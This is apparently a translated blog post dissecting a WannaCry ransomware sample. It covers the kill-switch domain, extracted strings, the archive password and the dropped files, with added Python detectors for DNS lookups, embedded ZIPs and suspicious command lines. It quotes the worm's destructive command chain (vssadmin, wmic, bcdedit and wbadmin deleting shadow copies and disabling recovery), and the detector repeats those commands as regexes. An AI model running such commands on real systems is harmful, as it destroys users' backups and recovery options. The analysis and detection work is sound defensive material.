
WannaCry virus cracking and analysis - 1

Dazzle Yi, four years ago (2017-05-14), Industry trends, 2727


Seeing the recent uproar over the ransomware worm encrypting campus networks, I was curious too.

Fortunately, a student braved all sorts of risks today and caught a live sample for research.

Here is how I "dissected" the virus, and what turned out to be interesting.


After the sample starts, it first requests the following domain name:
hxxp://www.iuqerfsodp9ifjaposdfjhgosurijfaewrgwea.com (scheme deliberately broken in the original)
Encryption only runs if that request fails; if the request succeeds, the sample skips encryption and exits immediately.
The domain was identified and taken over by security researchers in the early days of the outbreak.
So for this ransomware, encryption stops only when the machine can connect to the secret kill-switch domain above; an intranet server with no outside access gets no benefit from the switch.
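Since a lookup of the kill-switch domain is itself a sign that the worm ran on a host, a defender can sweep resolver logs for it. The following is an added example (not tooling from the original post): it parses constructed DNS query log lines in an assumed BIND-style format and reports, per client IP, every exact lookup of the domain quoted above. Look-alike or parent domains are deliberately not matched.

```python
"""Flag hosts that looked up the WannaCry kill-switch domain in DNS query logs.

Added example, not from the original post. A successful lookup means the
sample found its switch and exited; the lookup itself is still a strong
indicator that the worm executed on that host.
"""
import re
from collections import defaultdict

# Domain quoted in the post above. Compared exactly (case-insensitively)
# against the query name so look-alike domains are not matched by accident.
KILL_SWITCH_DOMAIN = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrgwea.com"

# Constructed sample lines in a BIND-like "query" log format (an assumption;
# adapt LINE_RE to your resolver's real format). IPs and times are made up.
SAMPLE_DNS_LOG = """\
2017-05-13 10:02:11 client 10.0.3.17#51123: query: www.iuqerfsodp9ifjaposdfjhgosurijfaewrgwea.com IN A
2017-05-13 10:02:12 client 10.0.3.17#51124: query: update.microsoft.com IN A
2017-05-13 10:05:40 client 10.0.8.201#40011: query: WWW.IUQERFSODP9IFJAPOSDFJHGOSURIJFAEWRGWEA.COM IN A
2017-05-13 10:06:02 client 10.0.8.201#40012: query: www.iuqerfsodp9ifjaposdfjhgosurijfaewrgwea.com IN AAAA
2017-05-13 10:07:55 client 10.0.3.18#51200: query: iuqerfsodp9ifjaposdfjhgosurijfaewrgwea.com.example.org IN A
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) client (?P<ip>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def parse_query_log(text):
    """Yield (timestamp, client_ip, qname, qtype); lines that don't match are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # Strip a trailing dot and lower-case so the comparison is exact.
            yield m["ts"], m["ip"], m["qname"].rstrip(".").lower(), m["qtype"]


def find_kill_switch_lookups(text):
    """Return {client_ip: [timestamps]} for every exact lookup of the kill-switch domain."""
    hits = defaultdict(list)
    for ts, ip, qname, _qtype in parse_query_log(text):
        if qname == KILL_SWITCH_DOMAIN:
            hits[ip].append(ts)
    return dict(hits)


if __name__ == "__main__":
    for ip, times in sorted(find_kill_switch_lookups(SAMPLE_DNS_LOG).items()):
        print(f"{ip}: {len(times)} kill-switch lookup(s), first at {times[0]}")
```

Note that a hit only tells you the sample started; whether the request then succeeded (and encryption was skipped) depends on whether that host could actually reach the domain, which is exactly the intranet caveat above.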

Some files encrypted by the WNcry ransomware worm can be recovered: see the links (?) or search for "foremost" on Cosine's microblog.


First of all, I installed Sandboxie under Windows and worked inside it. The sandbox isolates the virus from the outside world and keeps it from damaging my system (the virus does not appear to have any anti-sandbox capability at the moment). I'm not a novice and shouldn't slip up, so I didn't bother running the virus in a virtual machine, but running it with no protection at all is still a bad idea, so I used the sandbox.


As usual, I first used Resource Hacker to look at the virus's resources, and a large resource whose content begins with "PK" caught my attention. As a rule of thumb, that is a compressed archive, and once exported it should be the payload.


Then I tried to decompress it and, as expected, it needed a password. So I went back to *nix and used strings to dump every string in the program. After a quick look, some very attractive strings stand out; they appear to be the program's string table. The contents are very interesting:

// Crypto APIs used by the virus. It uses industry-standard, recognised-secure encryption, so the ciphertext basically can't be cracked.
Microsoft Enhanced RSA and AES Cryptographic Provider
CryptGenKey
CryptDecrypt
CryptEncrypt
CryptDestroyKey
CryptImportKey
CryptAcquireContextA
// Commands executed by the virus
cmd.exe /c "%s"
// These look like Bitcoin addresses?
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
// Virus mutex, registration, scheduled task, etc.
%s%d
Global\MsWinZonesCacheCounterMutexA
tasksche.exe
TaskStart
t.wnry
// The virus grants Everyone full control over the current directory and all subfolders
icacls . /grant Everyone:F /T /C /Q
// The virus hides the current folder
attrib +h .
// Ha ha, if this isn't the password, what is?

WNcry@2ol7
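The "PK" resource spotted in Resource Hacker and the strings dump can both be checked programmatically. As an added example (not the post's own tooling), the script below carves ZIP archives out of an arbitrary binary blob: it finds local-file-header signatures, confirms each one has an end-of-central-directory record whose offsets are consistent with that start, lists the entries, and reports whether they are encrypted (the post's archive was, hence the password hunt). The blob it scans is constructed in-line; the file names inside mimic the post's listing but the contents are placeholders.

```python
"""Carve embedded ZIP archives out of a binary blob and list their contents.

Added example, not tooling from the original post. Locates "PK\x03\x04"
local headers, validates each against a matching end-of-central-directory
(EOCD) record, then lets zipfile parse the exact byte range.
"""
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
EOCD_SIG = b"PK\x05\x06"
# EOCD fields: sig, disk no, cd disk, entries on disk, entries total,
# cd size, cd offset (relative to archive start), comment length
EOCD = struct.Struct("<4s4H2LH")


def build_constructed_blob():
    """Constructed stand-in for an exported resource: junk bytes around a small zip.

    Names mimic the post's file listing; the contents are placeholders.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("msg/m_english.wnry", "placeholder ransom note text")
        zf.writestr("t.wnry", b"\x00" * 64)
    return b"\x00" * 100 + b"MZ\x90\x00junk" + buf.getvalue() + b"\xff" * 37


def archive_end(blob, start):
    """Return the end offset of the zip that begins at `start`, or None.

    An EOCD belongs to this archive only if its central-directory offset
    (relative to `start`) plus the directory size lands exactly on the EOCD
    itself. That rejects later local headers inside the same zip, which would
    otherwise look like extra archive starts.
    """
    pos = blob.find(EOCD_SIG, start)
    while pos != -1 and pos + EOCD.size <= len(blob):
        _sig, _d, _cdd, _nd, _nt, cd_size, cd_offset, comment_len = EOCD.unpack_from(blob, pos)
        if start + cd_offset + cd_size == pos:
            return pos + EOCD.size + comment_len
        pos = blob.find(EOCD_SIG, pos + 1)
    return None


def carve_zip_archives(blob):
    """Return a list of {"offset", "size", "entries", "encrypted"} for every zip in blob."""
    found, cursor = [], 0
    while (off := blob.find(LOCAL_HEADER_SIG, cursor)) != -1:
        end = archive_end(blob, off)
        if end is None:
            cursor = off + 1  # stray signature or inner header: keep scanning
            continue
        with zipfile.ZipFile(io.BytesIO(blob[off:end])) as zf:
            infos = zf.infolist()
            found.append({
                "offset": off,
                "size": end - off,
                "entries": [i.filename for i in infos],
                # Bit 0 of the general-purpose flag marks a password-protected entry;
                # this is what made the post's archive ask for a password.
                "encrypted": any(i.flag_bits & 0x1 for i in infos),
            })
        cursor = end
    return found


if __name__ == "__main__":
    for arc in carve_zip_archives(build_constructed_blob()):
        state = "encrypted" if arc["encrypted"] else "not encrypted"
        print(f"zip at offset {arc['offset']} ({arc['size']} bytes, {state}): {arc['entries']}")
```

On a real sample you would pass the bytes of the exported resource (or the whole executable) instead of the constructed blob; the entry names are visible even when the archive is encrypted, since only file contents are protected.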


After entering the password and decompressing, the archive contains the following files and folders:

msg\ // a directory containing ransom notes in 28 languages. I suspect they were written in Word and saved as RTF. I read the English and Chinese ones: the layout is neat and the translation quality is very high; the Chinese is slightly better than the English and more malicious in tone. If the author of the virus is not Chinese, then it bears no particular malice toward China.


b.wnry // image used by the virus
c.wnry // contains a pile of .onion addresses, presumably the configuration used for Tor, plus a download link for Tor
r.wnry // dialog (ransom window) contents
s.wnry // a complete compressed package of the Tor program
t.wnry // current use unknown
taskdl.exe // a simple program whose purpose is unknown at present; it seems to be written entirely against the C++ library
taskse.exe // a simple program whose purpose is unknown at present, but since it uses wtsapi32.dll it may be related to remote desktop control
u.wnry // the dropped main program; not analysed carefully yet, but one command in it (after tidying up) is striking:

cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet


This command chain shuts down and deletes all of the user's backups (volume shadow copies and the backup catalog), stops recovery from starting at boot, and suppresses the boot error display those changes would otherwise cause. So system restore and local backups are very likely useless.
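Each piece of that chain is a well-known ransomware precursor, and process-creation telemetry is the place to catch it. The following is an added example, not from the original post: it scores command lines against the five parts of the chain quoted above and scans a few constructed process-creation events (a minimal JSON-lines shape loosely modelled on Sysmon Event ID 1; the field names and paths are assumptions). Because `vssadmin` or `bcdedit` alone have legitimate administrative uses, the result carries the matched indicators and a count rather than a single yes/no, so a caller can alert on a threshold.

```python
"""Flag process-creation events that destroy backups and disable recovery.

Added example, not from the original post. Matches normalised command lines
against the pieces of the WannaCry command chain quoted above.
"""
import json
import re

# (indicator name, regex over the normalised command line)
INDICATORS = [
    ("vssadmin_delete_shadows", re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b")),
    ("wmic_shadowcopy_delete", re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b")),
    ("bcdedit_ignore_failures", re.compile(
        r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures\b")),
    ("bcdedit_recovery_off", re.compile(
        r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b")),
    ("wbadmin_delete_catalog", re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b")),
]


def normalise(cmdline):
    """Lower-case and collapse whitespace so casing or extra spaces don't evade the regexes."""
    return re.sub(r"\s+", " ", cmdline.strip().lower())


def score_command_line(cmdline):
    """Return the names of every indicator matched by one command line."""
    norm = normalise(cmdline)
    return [name for name, rx in INDICATORS if rx.search(norm)]


# Constructed sample events (JSON lines). Field names, hosts and the parent
# path of tasksche.exe are assumptions; only the command lines matter here.
SAMPLE_EVENTS = r"""
{"host": "ws-017", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "C:\\Users\\u\\AppData\\tasksche.exe", "cmdline": "cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"}
{"host": "ws-018", "image": "C:\\Windows\\System32\\vssadmin.exe", "parent": "C:\\Windows\\System32\\cmd.exe", "cmdline": "vssadmin list shadows"}
{"host": "srv-02", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "cmd /c  VSSADMIN.EXE  Delete   Shadows /All /Quiet"}
"""


def scan_events(jsonl):
    """Parse JSON-lines events and return one finding per event that matches >= 1 indicator."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        matched = score_command_line(ev.get("cmdline", ""))
        if matched:
            findings.append({
                "host": ev.get("host"),
                "parent": ev.get("parent"),
                "indicators": matched,
                "score": len(matched),
            })
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        level = "CRITICAL" if f["score"] >= 3 else "suspicious"
        print(f"{f['host']}: {level} ({f['score']}/{len(INDICATORS)}) "
              f"parent={f['parent']} {f['indicators']}")
```

A single `vssadmin delete shadows` from an administrator's console is worth a look; the full chain of five from a process spawned by an unknown executable is the ransomware pattern the post describes, so a threshold of three or more is a reasonable place to page someone.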

A few words about Tor. Tor (The Onion Router) is free software for anonymous communication. It is an implementation of second-generation onion routing, through which users can communicate anonymously on the Internet. The project was initially sponsored by the U.S. Naval Research Laboratory. In late 2004 Tor became a project of the Electronic Frontier Foundation (EFF); in late 2005 the EFF stopped sponsoring Tor but continued to host its official website. Tor is used to defeat the traffic filtering and sniffing that are widespread on the Internet. It communicates over an overlay network of onion routers, which provides both anonymous outbound connections and anonymous hidden services.

In short, through Tor the attackers can control the virus's behaviour remotely and anonymously.

Bitcoin is a decentralised (not controlled by any bank or institution; its integrity rests on security protocols and mathematical proof) anonymous electronic currency, which allows anonymous payment without revealing one's identity.

That's all for now.
